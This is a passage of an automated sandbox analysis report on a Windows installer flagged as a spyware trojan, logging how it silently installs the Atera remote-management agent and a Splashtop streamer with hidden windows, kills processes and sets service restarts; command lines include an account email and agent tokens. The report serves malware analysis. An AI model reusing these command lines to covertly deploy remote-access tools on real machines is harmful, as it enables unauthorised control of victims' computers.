                                Source: System.Data.Common.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Reflection.DispatchProxy.dll.1.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.1.drStatic PE information: No import functions for PE file found
                                Source: System.Collections.dll.1.drStatic PE information: No import functions for PE file found
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenameAlphaControlAgentInstallation.dll\ vs Arquivo_4593167.msi
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenameSfxCA.dll\ vs Arquivo_4593167.msi
                                Source: Arquivo_4593167.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Arquivo_4593167.msi
                                Source: LiteDB.dll.24.drBinary or memory string: .sln
                                Source: LiteDB.dll.24.drBinary or memory string: .csproj.css
                                Source: LiteDB.dll.24.drBinary or memory string: .vbproj.vbs
                                Source: classification engineClassification label: mal100.troj.spyw.evad.winMSI@188/1121@0/8
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_0042BB20 GetDiskFreeSpaceExW,_memset,SHGetFolderPathW,SHGetFolderPathW,GetDiskFreeSpaceExW,MessageBoxW,_DebugHeapAllocator,_memset,__aulldiv,__aullrem,36_2_0042BB20
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_00429120 CreateToolhelp32Snapshot,Process32FirstW,_DebugHeapAllocator,ProcessIdToSessionId,Process32NextW,CloseHandle,36_2_00429120
                                Source: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exeCode function: 40_2_00007FF6279D3140 CoCreateInstance,40_2_00007FF6279D3140
                                Source: C:\Windows\Temp\SplashtopStreamer.exeCode function: 36_2_004021F0 LoadResource,LockResource,SizeofResource,36_2_004021F0
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ATERA NetworksJump to behavior
                                Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeMutant created: NULL
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \Sessions\1\BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7064:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6348:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5804:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3168:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7956:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6272:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3152:120:WilError_03
                                Source: C:\Windows\Temp\SplashtopStreamer.exeMutant created: \BaseNamedObjects\Global\{47B9233E-7E50-46F2-B442-6A53F0D0F508}
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1308:120:WilError_03
                                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8036:120:WilError_03
                                Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DFF7EC8F46D19662E2.TMPJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
                                Source: C:\Windows\System32\sppsvc.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;AteraAgent.exe&quot;)
                                Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeFile read: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.ini
                                Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: Arquivo_4593167.msiStatic file information: TRID: Microsoft Windows Installer (60509/1) 57.88%
                                Source: Arquivo_4593167.msiReversingLabs: Detection: 23%
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Arquivo_4593167.msi"
                                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallation
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k smphost
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: C:\Windows\Temp\unpack\PreVerCheck.exe "C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\Temp\unpack\PreVerCheck.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill.exe /F /IM SRServer.exe /T
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B94C8984E2657846CB3FC17409B05D4Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 987DB95BE1D08D72E3D28015C548C789 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="000111.financeiro@yamahaconcessionaria.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000LlkxmIAB" /AgentId="bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC672.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4507343 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentIdJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIC961.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4508140 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStartJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIDCAB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4512968 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSIF4AD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4519093 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEndJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgent
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exe
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "dda45391-8ca1-4116-81d7-6a5f04c3dc70" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "927926aa-335a-417d-b375-138a84c77d14" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "e24a5d52-0d16-40c8-ae18-af372363c3dc" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" bc2f6fef-7e04-492a-b3cb-1c03cb0df5b2 "c7045ac8-f19b-40af-bcd9-2d8df64c2185" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIn0=" 001Q300000LlkxmIAB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
